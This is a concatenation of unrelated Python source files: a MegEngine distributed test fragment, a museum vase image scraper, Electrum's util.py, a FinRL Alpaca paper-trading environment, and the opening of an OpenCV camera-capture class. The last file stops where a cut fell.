p0.start()
p1.start()
p0.join(10)
p1.join(10)
assert p0.exitcode == 0 and p1.exitcode == 0
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
@pytest.mark.isolated_distributed
def test_synchronized():
world_size = 2
backend = "nccl"
@dist.synchronized
def func(rank, q):
q.put(rank)
def worker(rank, q):
if not mge.is_cuda_available():
return
_init_process_group_wrapper(world_size, rank, rank, backend, q)
dist.group_barrier()
if rank == 0:
func(0, q) # q.put(0)
q.put(2)
else:
_assert_q_val(q, 0) # func executed in rank 0
_assert_q_empty(q) # q.put(2) is not executed
func(1, q)
_assert_q_val(
q, 1
) # func in rank 1 executed earlier than q.put(2) in rank 0
_assert_q_val(q, 2) # q.put(2) executed in rank 0
Q = mp.Queue()
p0 = mp.Process(target=worker, args=(0, Q))
p1 = mp.Process(target=worker, args=(1, Q))
p0.start()
p1.start()
p0.join(10)
p1.join(10)
assert p0.exitcode == 0 and p1.exitcode == 0
|
get_images_and_info.py
|
import os
import time
import pickle
import shutil
import requests
from requests_html import HTMLSession
from threading import Lock, Thread
from tqdm import tqdm
vase_fname = 'data/raw/vase_links_all.txt'
info_fname = 'data/raw/vase_info.pkl'
n_vases = 25610 # may change if file above is regenerated
def requests_setup():
session = HTMLSession()
return session
def download_img(url, fname):
img_data = requests.get(url, stream=True)
img_data.raw.decode_content = True
with open(fname, 'wb') as img_f:
shutil.copyfileobj(img_data.raw, img_f)
del img_data
def get_img_info_thread(url):
img_id = int(url.split('/')[-1])
# uncomment this and download_img if you want it all in one loop
# I don't do that to slow down requests a bit
# img_fname = f'data/raw/vase_imgs/{img_id}.jpg'
# if os.path.exists(img_fname):
# return
# split getting info and downloading image requests
# cut bombarding server in half
# also cap the number of concurrent threads in __main__
if img_id not in all_info:
session = requests_setup()
r = session.get(url)
imgs = r.html.find('.artwork__image')
# make sure there's just one so there's no ambiguity
try:
assert len(imgs) == 1
except AssertionError:
return
src = imgs[0].attrs['src']
# download_img(src, img_fname)
info_section = r.html.find('.artwork-info')[0]
keys = info_section.find('.artwork__tombstone--label')
vals = info_section.find('.artwork__tombstone--value')
keys = [key.text[:-1] for key in keys]
vals = [val.text for val in vals]
img_info = dict(zip(keys, vals))
img_info['src'] = src
# also get image description
img_desc_section = r.html.find('.artwork__intro__desc')
desc = img_desc_section[0].find('p')[0].text
img_info['description'] = desc
# input(img_info)
facets = r.html.find('.artwork__facets')
# also get more metadata, but set defaults if they don't exist
locations = []
era = ''
for facet in facets:
facet_label = facet.find('.artwork__facets--label')
if not facet_label:
continue
elif 'Object Type' in facet_label[0].text:
categories = facet.find('a')
categories = [' '.join(c.text.split()[:-1]) for c in categories]
elif 'Geographic' in facet_label[0].text:
locations = facet.find('a')
locations = [' '.join(l.text.split()[:-1]) for l in locations]
elif 'Date / Era' in facet_label[0].text:
era = facet.find('a')[0]
era = ' '.join(era.text.split()[:-1])
img_info['categories'] = categories
img_info['location'] = locations
img_info['era'] = era
with all_info_lock:
all_info[img_id] = img_info
else:
pass
# print('skipping populated ID', img_id)
def get_img_thread(url):
img_id = int(url.split('/')[-1])
img_fname = f'data/raw/vase_imgs/{img_id}.jpg'
if os.path.exists(img_fname):
return
if img_id in all_info:
src = all_info[img_id]['src']
download_img(src, img_fname)
else:
pass
# print('skipping unpopulated ID', img_id)
if __name__ == '__main__':
if os.path.exists(info_fname):
with open(info_fname, 'rb') as f:
all_info = pickle.load(f)
else:
all_info = dict()
all_info_lock = Lock()
threads = list()
# make list of thread targets to run sequentially
# parameters are [target, whether_to_run, max_threads]
thread_targets = list()
thread_targets.append([get_img_info_thread, True, 32])
thread_targets.append([get_img_thread, True, 10])
for thread_target, do_run, max_threads in thread_targets:
if do_run:
with open(vase_fname, 'r') as f_links:
for line in tqdm(f_links, total=n_vases):
url = line.strip() # trim newline
# thread_target(url) # for testing
t = Thread(target=thread_target, args=(url,))
t.start()
threads.append(t)
if len(threads) >= max_threads:
for t in threads:
t.join()
threads = []
for t in threads:
t.join()
if thread_target == get_img_info_thread:
with open(info_fname, 'wb') as f:
pickle.dump(all_info, f)
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'BTC':8, 'mBTC':5, 'uBTC':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh_builder = lambda x: bytes.fromhex(x)
def hfu(x):
"""
py2-py3 aware wrapper for str.encode('hex')
:param x: str
:return: str
"""
assert_bytes(x)
return binascii.hexlify(x)
def bfh(x):
"""
py2-py3 aware wrapper to "bytes.fromhex()" func
:param x: str
:rtype: bytes
"""
if isinstance(x, str):
return bfh_builder(x)
# TODO: check for iterator interface
elif isinstance(x, (list, tuple, map)):
return [bfh(sub) for sub in x]
else:
raise TypeError('Unexpected type: ' + str(type(x)))
def bh2u(x):
"""
unicode with hex representation of bytes()
e.g. x = bytes([1, 2, 10])
bh2u(x) -> '01020A'
:param x: bytes
:rtype: str
"""
assert_bytes(x)
return binascii.hexlify(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Biteasy.com': ('https://www.biteasy.com/blockchain',
{'tx': 'transactions', 'addr': 'addresses'}),
'Bitflyer.jp': ('https://chainflyer.bitflyer.jp',
{'tx': 'Transaction', 'addr': 'Address'}),
'Blockchain.info': ('https://blockchain.info',
{'tx': 'tx', 'addr': 'address'}),
'blockchainbdgpzk.onion': ('https://blockchainbdgpzk.onion',
{'tx': 'tx', 'addr': 'address'}),
'Blockr.io': ('https://btc.blockr.io',
{'tx': 'tx/info', 'addr': 'address/info'}),
'Blocktrail.com': ('https://www.blocktrail.com/BTC',
{'tx': 'tx', 'addr': 'address'}),
'BTC.com': ('https://chain.btc.com',
{'tx': 'tx', 'addr': 'address'}),
'Chain.so': ('https://www.chain.so',
{'tx': 'tx/BTC', 'addr': 'address/BTC'}),
'Insight.is': ('https://insight.bitpay.com',
{'tx': 'tx', 'addr': 'address'}),
'TradeBlock.com': ('https://tradeblock.com/blockchain',
{'tx': 'tx', 'addr': 'address'}),
'BlockCypher.com': ('https://live.blockcypher.com/btc',
{'tx': 'tx', 'addr': 'address'}),
'Blockchair.com': ('https://blockchair.com/bitcoin',
{'tx': 'transaction', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBTC',
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Blocktrail.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a bitcoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise BaseException("Not a bitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid bitcoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import errno
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except socket.error as e:
if e[0] in (errno.EWOULDBLOCK,errno.EAGAIN):
print_error("EAGAIN: retrying")
time.sleep(0.1)
continue
elif e[0] in ['timed out', 'The write operation timed out']:
print_error("socket timeout, retry")
time.sleep(0.1)
continue
else:
traceback.print_exc(file=sys.stdout)
raise e
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def check_www_dir(rdir):
import urllib, shutil, os
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urllib.parse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.request.urlretrieve(URL, path)
|
env_stock_papertrading_sb3.py
|
import datetime
import threading
import time
import alpaca_trade_api as tradeapi
import numpy as np
import pandas as pd
from finrl_meta.data_processors.alpaca import Alpaca
class AlpacaPaperTrading_sb3():
def __init__(self, ticker_list, time_interval, agent, cwd, net_dim,
state_dim, action_dim, API_KEY, API_SECRET,
API_BASE_URL, tech_indicator_list, turbulence_thresh=30, max_stock=1e2):
# load agent
if agent == 'ppo':
from stable_baselines3 import PPO
try:
# load agent
self.model = PPO.load(cwd)
print("Successfully load model", cwd)
except:
raise ValueError('Fail to load agent!')
else:
raise ValueError('Agent input is NOT supported yet.')
# connect to Alpaca trading API
try:
self.alpaca = tradeapi.REST(API_KEY, API_SECRET, API_BASE_URL, 'v2')
except:
raise ValueError('Fail to connect Alpaca. Please check account info and internet connection.')
# read trading time interval
if time_interval == '1s':
self.time_interval = 1
elif time_interval == '5s':
self.time_interval = 5
elif time_interval == '1Min':
self.time_interval = 60
elif time_interval == '5Min':
self.time_interval = 60 * 5
elif time_interval == '15Min':
self.time_interval = 60 * 15
else:
raise ValueError('Time interval input is NOT supported yet.')
# read trading settings
self.tech_indicator_list = tech_indicator_list
self.turbulence_thresh = turbulence_thresh
self.max_stock = max_stock
# initialize account
self.stocks = np.asarray([0] * len(ticker_list)) # stocks holding
self.stocks_cd = np.zeros_like(self.stocks)
self.cash = None # cash record
self.stocks_df = pd.DataFrame(self.stocks, columns=['stocks'], index=ticker_list)
self.asset_list = []
self.price = np.asarray([0] * len(ticker_list))
self.stockUniverse = ticker_list
self.turbulence_bool = 0
self.equities = []
def run(self):
orders = self.alpaca.list_orders(status="open")
for order in orders:
self.alpaca.cancel_order(order.id)
# Wait for market to open.
print("Waiting for market to open...")
tAMO = threading.Thread(target=self.awaitMarketOpen)
tAMO.start()
tAMO.join()
print("Market opened.")
while True:
# Figure out when the market will close so we can prepare to sell beforehand.
clock = self.alpaca.get_clock()
closingTime = clock.next_close.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
self.timeToClose = closingTime - currTime
if (self.timeToClose < (60)):
# Close all positions when 1 minutes til market close.
print("Market closing soon. Stop trading.")
break
'''# Close all positions when 1 minutes til market close.
print("Market closing soon. Closing positions.")
positions = self.alpaca.list_positions()
for position in positions:
if(position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(int(float(position.qty)))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, position.symbol, orderSide, respSO))
tSubmitOrder.start()
tSubmitOrder.join()
# Run script again after market close for next trading day.
print("Sleeping until market close (15 minutes).")
time.sleep(60 * 15)'''
else:
trade = threading.Thread(target=self.trade)
trade.start()
trade.join()
last_equity = float(self.alpaca.get_account().last_equity)
cur_time = time.time()
self.equities.append([cur_time, last_equity])
np.save('paper_trading_records.npy', np.asarray(self.equities, dtype=float))
time.sleep(self.time_interval)
def awaitMarketOpen(self):
isOpen = self.alpaca.get_clock().is_open
while (not isOpen):
clock = self.alpaca.get_clock()
openingTime = clock.next_open.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
timeToOpen = int((openingTime - currTime) / 60)
print(str(timeToOpen) + " minutes til market open.")
time.sleep(60)
isOpen = self.alpaca.get_clock().is_open
def trade(self):
state = self.get_state()
action = self.model.predict(state)[0]
action = (action * self.max_stock).astype(int)
self.stocks_cd += 1
if self.turbulence_bool == 0:
min_action = 10 # stock_cd
for index in np.where(action < -min_action)[0]: # sell_index:
sell_num_shares = min(self.stocks[index], -action[index])
qty = abs(int(sell_num_shares))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, self.stockUniverse[index], 'sell', respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.cash = float(self.alpaca.get_account().cash)
self.stocks_cd[index] = 0
for index in np.where(action > min_action)[0]: # buy_index:
if self.cash < 0:
tmp_cash = 0
else:
tmp_cash = self.cash
buy_num_shares = min(tmp_cash // self.price[index], abs(int(action[index])))
qty = abs(int(buy_num_shares))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, self.stockUniverse[index], 'buy', respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.cash = float(self.alpaca.get_account().cash)
self.stocks_cd[index] = 0
else: # sell all when turbulence
positions = self.alpaca.list_positions()
for position in positions:
if (position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(int(float(position.qty)))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, position.symbol, orderSide, respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.stocks_cd[:] = 0
def get_state(self):
alpaca = Alpaca(api=self.alpaca)
price, tech, turbulence = alpaca.fetch_latest_data(ticker_list=self.stockUniverse, time_interval='1Min',
tech_indicator_list=self.tech_indicator_list)
turbulence_bool = 1 if turbulence >= self.turbulence_thresh else 0
turbulence = (self.sigmoid_sign(turbulence, self.turbulence_thresh) * 2 ** -5).astype(np.float32)
tech = tech * 2 ** -7
positions = self.alpaca.list_positions()
stocks = [0] * len(self.stockUniverse)
for position in positions:
ind = self.stockUniverse.index(position.symbol)
stocks[ind] = (abs(int(float(position.qty))))
stocks = np.asarray(stocks, dtype=float)
cash = float(self.alpaca.get_account().cash)
self.cash = cash
self.stocks = stocks
self.turbulence_bool = turbulence_bool
self.price = price
amount = np.array(max(self.cash, 1e4) * (2 ** -12), dtype=np.float32)
scale = np.array(2 ** -6, dtype=np.float32)
state = np.hstack((amount,
turbulence,
self.turbulence_bool,
price * scale,
self.stocks * scale,
self.stocks_cd,
tech,
)).astype(np.float32)
print(len(self.stockUniverse))
return state
def submitOrder(self, qty, stock, side, resp):
if (qty > 0):
try:
self.alpaca.submit_order(stock, qty, side, "market", "day")
print("Market order of | " + str(qty) + " " + stock + " " + side + " | completed.")
resp.append(True)
except:
print("Order of | " + str(qty) + " " + stock + " " + side + " | did not go through.")
resp.append(False)
else:
print("Quantity is 0, order of | " + str(qty) + " " + stock + " " + side + " | not completed.")
resp.append(True)
@staticmethod
def sigmoid_sign(ary, thresh):
def sigmoid(x):
return 1 / (1 + np.exp(-x * np.e)) - 0.5
return sigmoid(ary / thresh) * thresh
|
cv2capture.py
|
###############################################################################
# OpenCV video capture
# Uses opencv video capture to capture system's camera
# Adapts to operating system and allows configuation of codec
# Urs Utzinger
# 2021 Initialize, Remove Frame acces (use only queue)
# 2019 Initial release, based on Bitbuckets FRC 4183 code
###############################################################################
###############################################################################
# Imports
###############################################################################
# Multi Threading
from threading import Thread, Lock
from queue import Queue
# System
import logging, time, sys
# Open Computer Vision
import cv2
###############################################################################
# Video Capture
###############################################################################
class cv2Capture(Thread):
"""
This thread continually captures frames from a camera
"""
# Initialize the Camera Thread
# Opens Capture Device and Sets Capture Properties
############################################################################
def __init__(self, configs,
camera_num: int = 0,
res: tuple = None, # width, height
exposure: float = None):
# populate desired settings from configuration file or function arguments
####################################################################
self.camera_num = camera_num
if exposure is not None:
self._exposure = exposure
else:
self._exposure = configs['exposure']
if res is not None:
self._camera_res = res
else:
self._camera_res = configs['camera_res']
self._output_res = configs['output_res']
self._output_width = self._output_res[0]
self._output_height = self._output_res[1]
self._framerate = configs['fps']
self._flip_method = configs['flip']
self._buffersize = configs['buffersize'] # camera drive buffer size
self._fourcc = configs['fourcc'] # camera sensor encoding format
self._autoexposure = configs['autoexposure'] # autoexposure depends on camera
self.capture = Queue(maxsize=32)
self.log = Queue(maxsize=32)
self.stopped = True
self.cam_lock = Lock()
# open up the camera
self._open_cam()
# Init vars
self.frame_time = 0.0
self.measured_fps = 0.0
Thread.__init__(self)
# Thread routines #################################################
# Start Stop and Update Thread
###################################################################
def stop(self):
"""stop the thread"""
self.stopped = True
# clean up
def start(self):
"""set the thread start conditions"""
self.stopped = False
T = Thread(target=self.update)
T.daemon = True # run in background
T.start()
# After Stating of the Thread, this runs continously
def update(self):
"""run the thread"""
last_time = time.time()
num_frames = 0
while not self.stopped:
current_time = time.time()
if self.cam is not None:
with self.cam_lock:
_, img = self.cam.read()
num_frames += 1
self.frame_time = int(current_time*1000)
if (img is not None) and (not self.capture.full()):
